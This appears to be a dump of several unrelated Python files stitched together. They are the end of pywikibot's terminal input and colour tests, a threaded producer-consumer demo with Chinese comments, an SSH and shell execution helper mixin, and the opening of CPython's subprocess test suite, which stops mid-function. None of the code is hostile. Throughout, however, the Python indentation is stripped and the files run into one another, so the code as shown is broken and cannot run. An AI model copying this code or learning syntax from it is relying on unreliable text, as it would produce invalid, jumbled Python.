def testInput(self):
newstdin.write('input to read\n')
newstdin.seek(0)
returned = pywikibot.input('question')
self.assertEqual(newstdout.getvalue(), '')
self.assertEqual(newstderr.getvalue(), 'question: ')
self.assertIsInstance(returned, str)
self.assertEqual(returned, 'input to read')
def test_input_yn(self):
newstdin.write('\n')
newstdin.seek(0)
returned = pywikibot.input_yn('question', False, automatic_quit=False)
self.assertEqual(newstdout.getvalue(), '')
self.assertEqual(newstderr.getvalue(), 'question ([y]es, [N]o): ')
self.assertFalse(returned)
def _call_input_choice(self):
rv = pywikibot.input_choice(
'question',
(('answer 1', 'A'),
('answer 2', 'N'),
('answer 3', 'S')),
'A',
automatic_quit=False)
self.assertEqual(newstdout.getvalue(), '')
self.assertIsInstance(rv, str)
return rv
def testInputChoiceDefault(self):
newstdin.write('\n')
newstdin.seek(0)
returned = self._call_input_choice()
self.assertEqual(returned, 'a')
def testInputChoiceCapital(self):
newstdin.write('N\n')
newstdin.seek(0)
returned = self._call_input_choice()
self.assertEqual(newstderr.getvalue(), self.input_choice_output)
self.assertEqual(returned, 'n')
def testInputChoiceNonCapital(self):
newstdin.write('n\n')
newstdin.seek(0)
returned = self._call_input_choice()
self.assertEqual(newstderr.getvalue(), self.input_choice_output)
self.assertEqual(returned, 'n')
def testInputChoiceIncorrectAnswer(self):
newstdin.write('X\nN\n')
newstdin.seek(0)
returned = self._call_input_choice()
self.assertEqual(newstderr.getvalue(), self.input_choice_output * 2)
self.assertEqual(returned, 'n')
@unittest.skipUnless(os.name == 'posix', 'requires Unix console')
class TestTerminalOutputColorUnix(UITestCase):
"""Terminal output color tests."""
str1 = 'text \03{lightpurple}light purple text\03{default} text'
def testOutputColorizedText(self):
pywikibot.output(self.str1)
self.assertEqual(newstdout.getvalue(), '')
self.assertEqual(
newstderr.getvalue(),
'text \x1b[95mlight purple text\x1b[0m text\n')
def testOutputNoncolorizedText(self):
pywikibot.config.colorized_output = False
pywikibot.output(self.str1)
self.assertEqual(newstdout.getvalue(), '')
self.assertEqual(
newstderr.getvalue(),
'text light purple text text ***\n')
str2 = ('normal text \03{lightpurple} light purple '
'\03{lightblue} light blue \03{previous} light purple '
'\03{default} normal text')
def testOutputColorCascade_incorrect(self):
"""Test incorrect behavior of testOutputColorCascade."""
pywikibot.output(self.str2)
self.assertEqual(newstdout.getvalue(), '')
self.assertEqual(
newstderr.getvalue(),
'normal text \x1b[95m light purple '
'\x1b[94m light blue \x1b[95m light purple '
'\x1b[0m normal text\n')
@unittest.skipUnless(os.name == 'posix', 'requires Unix console')
class TestTerminalUnicodeUnix(UITestCase):
"""Terminal output tests for unix."""
def testOutputUnicodeText(self):
pywikibot.output('Заглавная_страница')
self.assertEqual(newstdout.getvalue(), '')
self.assertEqual(newstderr.getvalue(), 'Заглавная_страница\n')
def testInputUnicodeText(self):
newstdin.write('Заглавная_страница\n')
newstdin.seek(0)
returned = pywikibot.input('Википедию? ')
self.assertEqual(newstdout.getvalue(), '')
self.assertEqual(
newstderr.getvalue(), 'Википедию? ')
self.assertIsInstance(returned, str)
self.assertEqual(returned, 'Заглавная_страница')
@unittest.skipUnless(os.name == 'posix', 'requires Unix console')
class TestTransliterationUnix(UITestCase):
"""Terminal output transliteration tests."""
def testOutputTransliteratedUnicodeText(self):
pywikibot.ui.encoding = 'latin-1'
pywikibot.config.transliterate = True
pywikibot.output('abcd АБГД αβγδ あいうえお')
self.assertEqual(newstdout.getvalue(), '')
self.assertEqual(
newstderr.getvalue(),
'abcd \x1b[93mA\x1b[0m\x1b[93mB\x1b[0m\x1b[93mG\x1b[0m'
'\x1b[93mD\x1b[0m \x1b[93ma\x1b[0m\x1b[93mb\x1b[0m\x1b[93mg'
'\x1b[0m\x1b[93md\x1b[0m \x1b[93ma\x1b[0m\x1b[93mi\x1b[0m'
'\x1b[93mu\x1b[0m\x1b[93me\x1b[0m\x1b[93mo\x1b[0m\n')
@unittest.skipUnless(os.name == 'nt', 'requires Windows console')
class WindowsTerminalTestCase(UITestCase):
"""MS Windows terminal tests."""
@classmethod
def setUpClass(cls):
if os.name != 'nt':
raise unittest.SkipTest('requires Windows console')
if not win32api:
raise unittest.SkipTest('requires Windows package pywin32')
if not win32clipboard:
raise unittest.SkipTest('requires Windows package win32clipboard')
if not pywinauto:
raise unittest.SkipTest('requires Windows package pywinauto')
try:
# pywinauto 0.5.0
cls._app = pywinauto.Application()
except AttributeError as e1:
try:
cls._app = pywinauto.application.Application()
except AttributeError as e2:
raise unittest.SkipTest('pywinauto Application failed: {}\n{}'
.format(e1, e2))
super().setUpClass()
@classmethod
def setUpProcess(cls, command):
si = subprocess.STARTUPINFO()
si.dwFlags = subprocess.STARTF_USESTDHANDLES
cls._process = subprocess.Popen(
command, creationflags=subprocess.CREATE_NEW_CONSOLE)
cls._app.connect_(process=cls._process.pid)
# set truetype font (Lucida Console, hopefully)
try:
window = cls._app.window_()
except Exception as e:
cls.tearDownProcess()
raise unittest.SkipTest(
'Windows package pywinauto could not locate window: {!r}'
.format(e))
try:
window.TypeKeys('% {UP}{ENTER}%L{HOME}L{ENTER}', with_spaces=True)
except Exception as e:
cls.tearDownProcess()
raise unittest.SkipTest(
'Windows package pywinauto could not use window TypeKeys: {!r}'
.format(e))
@classmethod
def tearDownProcess(cls):
cls._process.kill()
def setUp(self):
super().setUp()
self.setclip('')
def waitForWindow(self):
while not self._app.window_().IsEnabled():
time.sleep(0.01)
def getstdouterr(self):
sentinel = '~~~~SENTINEL~~~~cedcfc9f-7eed-44e2-a176-d8c73136c185'
# select all and copy to clipboard
self._app.window_().SetFocus()
self.waitForWindow()
self._app.window_().TypeKeys(
'% {UP}{UP}{UP}{RIGHT}{DOWN}{DOWN}{DOWN}{ENTER}{ENTER}',
with_spaces=True)
while True:
data = self.getclip()
if data != sentinel:
return data
time.sleep(0.01)
def setclip(self, text):
win32clipboard.OpenClipboard()
win32clipboard.SetClipboardData(win32clipboard.CF_UNICODETEXT, text)
win32clipboard.CloseClipboard()
def getclip(self):
win32clipboard.OpenClipboard()
data = win32clipboard.GetClipboardData(win32clipboard.CF_UNICODETEXT)
win32clipboard.CloseClipboard()
data = data.split('\x00')[0]
data = data.replace('\r\n', '\n')
return data
def sendstdin(self, text):
self.setclip(text.replace('\n', '\r\n'))
self._app.window_().SetFocus()
self.waitForWindow()
self._app.window_().TypeKeys(
'% {UP}{UP}{UP}{RIGHT}{DOWN}{DOWN}{ENTER}',
with_spaces=True)
class TestWindowsTerminalUnicode(WindowsTerminalTestCase):
"""MS Windows terminal unicode tests."""
@classmethod
def setUpClass(cls):
super().setUpClass()
fn = inspect.getfile(inspect.currentframe())
cls.setUpProcess(['python', 'pwb.py', fn,
'--run-as-slave-interpreter'])
_manager.connect()
cls.pywikibot = _manager.pywikibot()
@classmethod
def tearDownClass(cls):
del cls.pywikibot
cls.tearDownProcess()
def setUp(self):
super().setUp()
self.pywikibot.set_config('colorized_output', True)
self.pywikibot.set_config('transliterate', False)
self.pywikibot.set_config('console_encoding', 'utf-8')
self.pywikibot.set_ui('transliteration_target', None)
self.pywikibot.set_ui('encoding', 'utf-8')
self.pywikibot.cls()
def testOutputUnicodeText_no_transliterate(self):
self.pywikibot.output('Заглавная_страница')
self.assertEqual(self.getstdouterr(), 'Заглавная_страница\n')
def testOutputUnicodeText_transliterate(self):
self.pywikibot.set_config('transliterate', True)
self.pywikibot.set_ui('transliteration_target', 'latin-1')
self.pywikibot.output('Заглавная_страница')
self.assertEqual(self.getstdouterr(), 'Zaglavnaya_stranica\n')
def testInputUnicodeText(self):
self.pywikibot.set_config('transliterate', True)
self.pywikibot.request_input('Википедию? ')
self.assertEqual(self.getstdouterr(), 'Википедию?')
self.sendstdin('Заглавная_страница\n')
returned = self.pywikibot.get_input()
self.assertEqual(returned, 'Заглавная_страница')
class TestWindowsTerminalUnicodeArguments(WindowsTerminalTestCase):
"""MS Windows terminal unicode argument tests."""
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.setUpProcess(['cmd', '/k', 'echo off'])
@classmethod
def tearDownClass(cls):
cls.tearDownProcess()
def testOutputUnicodeText_no_transliterate(self):
self.sendstdin(
'python -c \"'
'import subprocess, pywikibot; '
"subprocess.run('cls', shell=True); "
"pywikibot.output('\\n'.join(pywikibot.handle_args()))\" "
'Alpha Bετα Гамма دلتا\n')
lines = []
for i in range(3):
lines = self.getstdouterr().split('\n')
if len(lines) >= 4 and 'Alpha' not in lines:
# if len(lines) < 4, we assume not all lines had been output
# yet, and retry. We check at least one of the lines contains
# "Alpha" to prevent using older clipboard content. We limit
# the number of retries to 3 so that the test will finish even
# if neither of these requirements are met.
break
time.sleep(1)
# empty line is the new command line
self.assertEqual(lines, ['Alpha', 'Bετα', 'Гамма', 'دلتا', ''])
# TODO: add tests for background colors.
class FakeUITest(TestCase):
"""Test case to allow doing uncolorized general UI tests."""
net = False
expected = 'Hello world you! ***'
expect_color = False
ui_class = terminal_interface_base.UI
def setUp(self):
"""Create dummy instances for the test and patch encounter_color."""
super().setUp()
self.stream = io.StringIO()
self.ui_obj = self.ui_class()
self._orig_encounter_color = self.ui_obj.encounter_color
self.ui_obj.encounter_color = self._encounter_color
self._index = 0
def tearDown(self):
"""Unpatch the encounter_color method."""
self.ui_obj.encounter_color = self._orig_encounter_color
super().tearDown()
self.assertEqual(self._index,
len(self._colors) if self.expect_color else 0)
def _getvalue(self):
"""Get the value of the stream."""
return self.stream.getvalue()
def _encounter_color(self, color, target_stream):
"""Patched encounter_color method."""
raise AssertionError('This method should not be invoked')
def test_no_color(self):
"""Test a string without any colors."""
self._colors = ()
self.ui_obj._print('Hello world you!', self.stream)
self.assertEqual(self._getvalue(), 'Hello world you!')
def test_one_color(self):
"""Test a string using one color."""
self._colors = (('red', 6), ('default', 10))
self.ui_obj._print('Hello \03{red}world you!', self.stream)
self.assertEqual(self._getvalue(), self.expected)
def test_flat_color(self):
"""Test using colors with defaulting in between."""
self._colors = (('red', 6), ('default', 6), ('yellow', 3),
('default', 1))
self.ui_obj._print('Hello \03{red}world \03{default}you\03{yellow}!',
self.stream)
self.assertEqual(self._getvalue(), self.expected)
def test_stack_with_pop_color(self):
"""Test using stacked colors and just popping the latest color."""
self._colors = (('red', 6), ('yellow', 6), ('red', 3), ('default', 1))
self.ui_obj._print('Hello \03{red}world \03{yellow}you\03{previous}!',
self.stream)
self.assertEqual(self._getvalue(), self.expected)
def test_stack_implicit_color(self):
"""Test using stacked colors without popping any."""
self._colors = (('red', 6), ('yellow', 6), ('default', 4))
self.ui_obj._print('Hello \03{red}world \03{yellow}you!', self.stream)
self.assertEqual(self._getvalue(), self.expected)
def test_one_color_newline(self):
"""Test with trailing new line and one color."""
self._colors = (('red', 6), ('default', 11))
self.ui_obj._print('Hello \03{red}world you!\n', self.stream)
self.assertEqual(self._getvalue(), self.expected + '\n')
class FakeUIColorizedTestBase(TestCase):
"""Base class for test cases requiring that colorized output is active."""
expect_color = True
def setUp(self):
"""Force colorized_output to True."""
super().setUp()
self._old_config = pywikibot.config2.colorized_output
pywikibot.config2.colorized_output = True
def tearDown(self):
"""Undo colorized_output configuration."""
pywikibot.config2.colorized_output = self._old_config
super().tearDown()
class FakeUnixTest(FakeUIColorizedTestBase, FakeUITest):
"""Test case to allow doing colorized Unix tests in any environment."""
net = False
expected = 'Hello world you!'
ui_class = terminal_interface_unix.UnixUI
def _encounter_color(self, color, target_stream):
"""Verify that the written data, color and stream are correct."""
self.assertIs(target_stream, self.stream)
expected_color = self._colors[self._index][0]
self._index += 1
self.assertEqual(color, expected_color)
self.assertLength(self.stream.getvalue(),
sum(e[1] for e in self._colors[:self._index]))
class FakeWin32Test(FakeUIColorizedTestBase, FakeUITest):
"""
Test case to allow doing colorized Win32 tests in any environment.
This only patches the ctypes import in the terminal_interface_win32
module. As the Win32CtypesUI is using the std-streams from another
import these will be unpatched.
"""
net = False
expected = 'Hello world you!'
ui_class = terminal_interface_win32.Win32UI
def setUp(self):
"""Patch the ctypes import and initialize a stream and UI instance."""
super().setUp()
self._orig_ctypes = terminal_interface_win32.ctypes
ctypes = FakeModule.create_dotted('ctypes.windll.kernel32')
ctypes.windll.kernel32.SetConsoleTextAttribute = self._handle_setattr
terminal_interface_win32.ctypes = ctypes
self.stream._hConsole = object()
def tearDown(self):
"""Unpatch the ctypes import and check that all colors were used."""
terminal_interface_win32.ctypes = self._orig_ctypes
super().tearDown()
def _encounter_color(self, color, target_stream):
"""Call the original method."""
self._orig_encounter_color(color, target_stream)
def _handle_setattr(self, handle, attribute):
"""Dummy method to handle SetConsoleTextAttribute."""
self.assertIs(handle, self.stream._hConsole)
color = self._colors[self._index][0]
self._index += 1
color = terminal_interface_win32.windowsColors[color]
self.assertEqual(attribute, color)
self.assertLength(self.stream.getvalue(),
sum(e[1] for e in self._colors[:self._index]))
class FakeWin32UncolorizedTest(FakeWin32Test):
"""Test case to allow doing uncolorized Win32 tests in any environment."""
net = False
expected = 'Hello world you! ***'
expect_color = False
def setUp(self):
"""Change the local stream's console to None to disable colors."""
super().setUp()
self.stream._hConsole = None
if __name__ == '__main__': # pragma: no cover
try:
with suppress(SystemExit):
unittest.main()
finally:
unpatch()
|
productor_customer.py | __author__ = 'Aaron Yang'
__email__ = 'byang971@usc.edu'
__date__ = '7/24/2020 10:29 PM'
import time
import queue
import threading
q = queue.Queue(10) # 生成一个队列,用来保存“包子”,最大数量为10
def productor(i):
# 厨师不停地每2秒做一个包子
while True:
q.put("厨师 %s 做的包子!" % i)
time.sleep(2)
def consumer(j):
# 顾客不停地每秒吃一个包子
while True:
print("顾客 %s 吃了一个 %s" % (j, q.get()))
time.sleep(1)
# 实例化了3个生产者(厨师)
for i in range(3):
t = threading.Thread(target=productor, args=(i,))
t.start()
# 实例化了10个消费者(顾客)
for j in range(10):
v = threading.Thread(target=consumer, args=(j,))
v.start()
|
exec.py | from utility import ssh, shell
import threading
class ExecMixin(object):
def sh(self, command_args, input = None, display = True, line_prefix = '', env = None, cwd = None, sudo = False):
if not env:
env = {}
return shell.Shell.exec(command_args,
input = input,
display = display,
line_prefix = line_prefix,
env = env,
cwd = cwd,
callback = self._sh_callback,
sudo = sudo
)
def _sh_callback(self, process, line_prefix, display = True):
def stream_stdout():
for line in process.stdout:
line = line.decode('utf-8').strip('\n')
if display:
self.info("{}{}".format(line_prefix, line))
def stream_stderr():
for line in process.stderr:
line = line.decode('utf-8').strip('\n')
if not line.startswith('[sudo]'):
self.warning("{}{}".format(line_prefix, line))
thrd_out = threading.Thread(target = stream_stdout)
thrd_out.start()
thrd_err = threading.Thread(target = stream_stderr)
thrd_err.start()
thrd_out.join()
thrd_err.join()
def ssh(self, hostname, username, password = None, key = None, timeout = 10, port = 22, env = None):
if not env:
env = {}
try:
conn = ssh.SSH(hostname, username, password,
key = key,
callback = self._ssh_callback,
timeout = timeout,
port = port,
env = env
)
conn.wrap_exec(self._ssh_exec)
conn.wrap_file(self._ssh_file)
except Exception as e:
self.error("SSH connection to {} failed: {}".format(hostname, e))
return conn
def _ssh_exec(self, ssh, executer, command, args, options):
id_prefix = "[{}]".format(ssh.hostname)
try:
return executer(command, args, options)
except Exception as e:
self.error("SSH {} execution failed: {}".format(command, e), prefix = id_prefix)
def _ssh_file(self, ssh, executer, callback, *args):
id_prefix = "[{}]".format(ssh.hostname)
try:
executer(callback, *args)
except Exception as e:
self.error("SFTP transfer failed: {}".format(e), prefix = id_prefix)
def _ssh_callback(self, ssh, stdin, stdout, stderr):
id_prefix = "[{}]".format(ssh.hostname)
def stream_stdout():
for line in stdout:
self.info(line.strip('\n'), prefix = id_prefix)
def stream_stderr():
for line in stderr:
if not line.startswith('[sudo]'):
self.warning(line.strip('\n'), prefix = id_prefix)
thrd_out = threading.Thread(target = stream_stdout)
thrd_out.start()
thrd_err = threading.Thread(target = stream_stderr)
thrd_err.start()
thrd_out.join()
thrd_err.join()
|
test_subprocess.py | import unittest
from unittest import mock
from test import support
import subprocess
import sys
import signal
import io
import itertools
import os
import errno
import tempfile
import time
import traceback
import selectors
import sysconfig
import select
import shutil
import threading
import gc
import textwrap
import json
from test.support import FakePath
try:
import _testcapi
except ImportError:
_testcapi = None
try:
import pwd
except ImportError:
pwd = None
try:
import grp
except ImportError:
grp = None
if support.PGO:
raise unittest.SkipTest("test is not helpful for PGO")
mswindows = (sys.platform == "win32")
#
# Depends on the following external programs: Python
#
if mswindows:
SETBINARY = ('import msvcrt; msvcrt.setmode(sys.stdout.fileno(), '
'os.O_BINARY);')
else:
SETBINARY = ''
NONEXISTING_CMD = ('nonexisting_i_hope',)
# Ignore errors that indicate the command was not found
NONEXISTING_ERRORS = (FileNotFoundError, NotADirectoryError, PermissionError)
ZERO_RETURN_CMD = (sys.executable, '-c', 'pass')
def setUpModule():
shell_true = shutil.which('true')
if shell_true is None:
return
if (os.access(shell_true, os.X_OK) and
subprocess.run([shell_true]).returncode == 0):
global ZERO_RETURN_CMD
ZERO_RETURN_CMD = (shell_true,) # Faster than Python startup.
class BaseTestCase(unittest.TestCase):
def setUp(self):
# Try to minimize the number of children we have so this test
# doesn't crash on some buildbots (Alphas in particular).
support.reap_children()
def tearDown(self):
if not mswindows:
# subprocess._active is not used on Windows and is set to None.
for inst in subprocess._active:
inst.wait()
subprocess._cleanup()
self.assertFalse(
subprocess._active, "subprocess._active not empty"
)
self.doCleanups()
support.reap_children()
class PopenTestException(Exception):
pass
class PopenExecuteChildRaises(subprocess.Popen):
"""Popen subclass for testing cleanup of subprocess.PIPE filehandles when
_execute_child fails.
"""
def _execute_child(self, *args, **kwargs):
raise PopenTestException("Forced Exception for Test")
class ProcessTestCase(BaseTestCase):
def test_io_buffered_by_default(self):
p = subprocess.Popen(ZERO_RETURN_CMD,
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
try:
self.assertIsInstance(p.stdin, io.BufferedIOBase)
self.assertIsInstance(p.stdout, io.BufferedIOBase)
self.assertIsInstance(p.stderr, io.BufferedIOBase)
finally:
p.stdin.close()
p.stdout.close()
p.stderr.close()
p.wait()
def test_io_unbuffered_works(self):
p = subprocess.Popen(ZERO_RETURN_CMD,
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, bufsize=0)
try:
self.assertIsInstance(p.stdin, io.RawIOBase)
self.assertIsInstance(p.stdout, io.RawIOBase)
self.assertIsInstance(p.stderr, io.RawIOBase)
finally:
p.stdin.close()
p.stdout.close()
p.stderr.close()
p.wait()
def test_call_seq(self):
# call() function with sequence argument
rc = subprocess.call([sys.executable, "-c",
"import sys; sys.exit(47)"])
self.assertEqual(rc, 47)
def test_call_timeout(self):
# call() function with timeout argument; we want to test that the child
# process gets killed when the timeout expires. If the child isn't
# killed, this call will deadlock since subprocess.call waits for the
# child.
self.assertRaises(subprocess.TimeoutExpired, subprocess.call,
[sys.executable, "-c", "while True: pass"],
timeout=0.1)
def test_check_call_zero(self):
# check_call() function with zero return code
rc = subprocess.check_call(ZERO_RETURN_CMD)
self.assertEqual(rc, 0)
def test_check_call_nonzero(self):
# check_call() function with non-zero return code
with self.assertRaises(subprocess.CalledProcessError) as c:
subprocess.check_call([sys.executable, "-c",
"import sys; sys.exit(47)"])
self.assertEqual(c.exception.returncode, 47)
def test_check_output(self):
# check_output() function with zero return code
output = subprocess.check_output(
[sys.executable, "-c", "print('BDFL')"])
self.assertIn(b'BDFL', output)
def test_check_output_nonzero(self):
# check_call() function with non-zero return code
with self.assertRaises(subprocess.CalledProcessError) as c:
subprocess.check_output(
[sys.executable, "-c", "import sys; sys.exit(5)"])
self.assertEqual(c.exception.returncode, 5)
def test_check_output_stderr(self):
# check_output() function stderr redirected to stdout
output = subprocess.check_output(
[sys.executable, "-c", "import sys; sys.stderr.write('BDFL')"],
stderr=subprocess.STDOUT)
self.assertIn(b'BDFL', output)
def test_check_output_stdin_arg(self):
# check_output() can be called with stdin set to a file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; sys.stdout.write(sys.stdin.read().upper())"],
stdin=tf)
self.assertIn(b'PEAR', output)
def test_check_output_input_arg(self):
# check_output() can be called with input set to a string
output = subprocess.check_output(
[sys.executable, "-c",
"import sys; sys.stdout.write(sys.stdin.read().upper())"],
input=b'pear')
self.assertIn(b'PEAR', output)
def test_check_output_stdout_arg(self):
# check_output() refuses to accept 'stdout' argument
with self.assertRaises(ValueError) as c:
output = subprocess.check_output(
[sys.executable, "-c", "print('will not be run')"],
stdout=sys.stdout)
self.fail("Expected ValueError when stdout arg supplied.")
self.assertIn('stdout', c.exception.args[0])
def test_check_output_stdin_with_input_arg(self):
# check_output() refuses to accept 'stdin' with 'input'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
with self.assertRaises(ValueError) as c:
output = subprocess.check_output(
[sys.executable, "-c", "print('will not be run')"],
stdin=tf, input=b'hare')
self.fail("Expected ValueError when stdin and input args supplied.")
self.assertIn('stdin', c.exception.args[0])
self.assertIn('input', c.exception.args[0])
def test_check_output_timeout(self):
# check_output() function with timeout arg
with self.assertRaises(subprocess.TimeoutExpired) as c:
output = subprocess.check_output(
[sys.executable, "-c",
"import sys, time\n"
"sys.stdout.write('BDFL')\n"
"sys.stdout.flush()\n"
"time.sleep(3600)"],
# Some heavily loaded buildbots (sparc Debian 3.x) require
# this much time to start and print.
timeout=3)
self.fail("Expected TimeoutExpired.")
self.assertEqual(c.exception.output, b'BDFL')
def test_call_kwargs(self):
# call() function with keyword args
newenv = os.environ.copy()
newenv["FRUIT"] = "banana"
rc = subprocess.call([sys.executable, "-c",
'import sys, os;'
'sys.exit(os.getenv("FRUIT")=="banana")'],
env=newenv)
self.assertEqual(rc, 1)
def test_invalid_args(self):
# Popen() called with invalid arguments should raise TypeError
# but Popen.__del__ should not complain (issue #12085)
with support.captured_stderr() as s:
self.assertRaises(TypeError, subprocess.Popen, invalid_arg_name=1)
argcount = subprocess.Popen.__init__.__code__.co_argcount
too_many_args = [0] * (argcount + 1)
self.assertRaises(TypeError, subprocess.Popen, *too_many_args)
self.assertEqual(s.getvalue(), '')
def test_stdin_none(self):
# .stdin is None when not redirected
p = subprocess.Popen([sys.executable, "-c", 'print("banana")'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
p.wait()
self.assertEqual(p.stdin, None)
def test_stdout_none(self):
# .stdout is None when not redirected, and the child's stdout will
# be inherited from the parent. In order to test this we run a
# subprocess in a subprocess:
# this_test
# \-- subprocess created by this test (parent)
# \-- subprocess created by the parent subprocess (child)
# The parent doesn't specify stdout, so the child will use the
# parent's stdout. This test checks that the message printed by the
# child goes to the parent stdout. The parent also checks that the
# child's stdout is None. See #11963.
code = ('import sys; from subprocess import Popen, PIPE;'
'p = Popen([sys.executable, "-c", "print(\'test_stdout_none\')"],'
' stdin=PIPE, stderr=PIPE);'
'p.wait(); assert p.stdout is None;')
p = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
out, err = p.communicate()
self.assertEqual(p.returncode, 0, err)
self.assertEqual(out.rstrip(), b'test_stdout_none')
def test_stderr_none(self):
# .stderr is None when not redirected
p = subprocess.Popen([sys.executable, "-c", 'print("banana")'],
stdin=subprocess.PIPE, stdout=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stdin.close)
p.wait()
self.assertEqual(p.stderr, None)
def _assert_python(self, pre_args, **kwargs):
# We include sys.exit() to prevent the test runner from hanging
# whenever python is found.
args = pre_args + ["import sys; sys.exit(47)"]
p = subprocess.Popen(args, **kwargs)
p.wait()
self.assertEqual(47, p.returncode)
def test_executable(self):
# Check that the executable argument works.
#
# On Unix (non-Mac and non-Windows), Python looks at args[0] to
# determine where its standard library is, so we need the directory
# of args[0] to be valid for the Popen() call to Python to succeed.
# See also issue #16170 and issue #7774.
doesnotexist = os.path.join(os.path.dirname(sys.executable),
"doesnotexist")
self._assert_python([doesnotexist, "-c"], executable=sys.executable)
def test_bytes_executable(self):
doesnotexist = os.path.join(os.path.dirname(sys.executable),
"doesnotexist")
self._assert_python([doesnotexist, "-c"],
executable=os.fsencode(sys.executable))
def test_pathlike_executable(self):
doesnotexist = os.path.join(os.path.dirname(sys.executable),
"doesnotexist")
self._assert_python([doesnotexist, "-c"],
executable=FakePath(sys.executable))
def test_executable_takes_precedence(self):
# Check that the executable argument takes precedence over args[0].
#
# Verify first that the call succeeds without the executable arg.
pre_args = [sys.executable, "-c"]
self._assert_python(pre_args)
self.assertRaises(NONEXISTING_ERRORS,
self._assert_python, pre_args,
executable=NONEXISTING_CMD[0])
@unittest.skipIf(mswindows, "executable argument replaces shell")
def test_executable_replaces_shell(self):
# Check that the executable argument replaces the default shell
# when shell=True.
self._assert_python([], executable=sys.executable, shell=True)
@unittest.skipIf(mswindows, "executable argument replaces shell")
def test_bytes_executable_replaces_shell(self):
self._assert_python([], executable=os.fsencode(sys.executable),
shell=True)
@unittest.skipIf(mswindows, "executable argument replaces shell")
def test_pathlike_executable_replaces_shell(self):
self._assert_python([], executable=FakePath(sys.executable),
shell=True)
# For use in the test_cwd* tests below.
def _normalize_cwd(self, cwd):
# Normalize an expected cwd (for Tru64 support).
# We can't use os.path.realpath since it doesn't expand Tru64 {memb}
# strings. See bug #1063571.
with support.change_cwd(cwd):
return os.getcwd()
# For use in the test_cwd* tests below.
def _split_python_path(self):
# Return normalized (python_dir, python_base).
python_path = os.path.realpath(sys.executable)
return os.path.split(python_path)
# For use in the test_cwd* tests below.
def _assert_cwd(self, expected_cwd, python_arg, **kwargs):
# Invoke Python via Popen, and assert that (1) the call succeeds,
# and that (2) the current working directory of the child process
# matches *expected_cwd*.
p = subprocess.Popen([python_arg, "-c",
"import os, sys; "
"sys.stdout.write(os.getcwd()); "
"sys.exit(47)"],
stdout=subprocess.PIPE,
**kwargs)
self.addCleanup(p.stdout.close)
p.wait()
self.assertEqual(47, p.returncode)
normcase = os.path.normcase
self.assertEqual(normcase(expected_cwd),
normcase(p.stdout.read().decode("utf-8")))
def test_cwd(self):
# Check that cwd changes the cwd for the child process.
temp_dir = tempfile.gettempdir()
temp_dir = self._normalize_cwd(temp_dir)
self._assert_cwd(temp_dir, sys.executable, cwd=temp_dir)
def test_cwd_with_bytes(self):
temp_dir = tempfile.gettempdir()
temp_dir = self._normalize_cwd(temp_dir)
self._assert_cwd(temp_dir, sys.executable, cwd=os.fsencode(temp_dir))
def test_cwd_with_pathlike(self):
temp_dir = tempfile.gettempdir()
temp_dir = self._normalize_cwd(temp_dir)
self._assert_cwd(temp_dir, sys.executable, cwd=FakePath(temp_dir))
@unittest.skipIf(mswindows, "pending resolution of issue #15533")
def test_cwd_with_relative_arg(self):
# Check that Popen looks for args[0] relative to cwd if args[0]
# is relative.
python_dir, python_base = self._split_python_path()
rel_python = os.path.join(os.curdir, python_base)
with support.temp_cwd() as wrong_dir:
# Before calling with the correct cwd, confirm that the call fails
# without cwd and with the wrong cwd.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python])
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python], cwd=wrong_dir)
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, rel_python, cwd=python_dir)
@unittest.skipIf(mswindows, "pending resolution of issue #15533")
def test_cwd_with_relative_executable(self):
# Check that Popen looks for executable relative to cwd if executable
# is relative (and that executable takes precedence over args[0]).
python_dir, python_base = self._split_python_path()
rel_python = os.path.join(os.curdir, python_base)
doesntexist = "somethingyoudonthave"
with support.temp_cwd() as wrong_dir:
# Before calling with the correct cwd, confirm that the call fails
# without cwd and with the wrong cwd.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[doesntexist], executable=rel_python)
self.assertRaises(FileNotFoundError, subprocess.Popen,
[doesntexist], executable=rel_python,
cwd=wrong_dir)
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, doesntexist, executable=rel_python,
cwd=python_dir)
def test_cwd_with_absolute_arg(self):
# Check that Popen can find the executable when the cwd is wrong
# if args[0] is an absolute path.
python_dir, python_base = self._split_python_path()
abs_python = os.path.join(python_dir, python_base)
rel_python = os.path.join(os.curdir, python_base)
with support.temp_dir() as wrong_dir:
# Before calling with an absolute path, confirm that using a
# relative path fails.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python], cwd=wrong_dir)
wrong_dir = self._normalize_cwd(wrong_dir)
self._assert_cwd(wrong_dir, abs_python, cwd=wrong_dir)
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
def test_executable_with_cwd(self):
python_dir, python_base = self._split_python_path()
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, "somethingyoudonthave",
executable=sys.executable, cwd=python_dir)
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
@unittest.skipIf(sysconfig.is_python_build(),
"need an installed Python. See #7774")
def test_executable_without_cwd(self):
# For a normal installation, it should work without 'cwd'
# argument. For test runs in the build directory, see #7774.
self._assert_cwd(os.getcwd(), "somethingyoudonthave",
executable=sys.executable)
def test_stdin_pipe(self):
# stdin redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=subprocess.PIPE)
p.stdin.write(b"pear")
p.stdin.close()
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdin_filedes(self):
# stdin is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
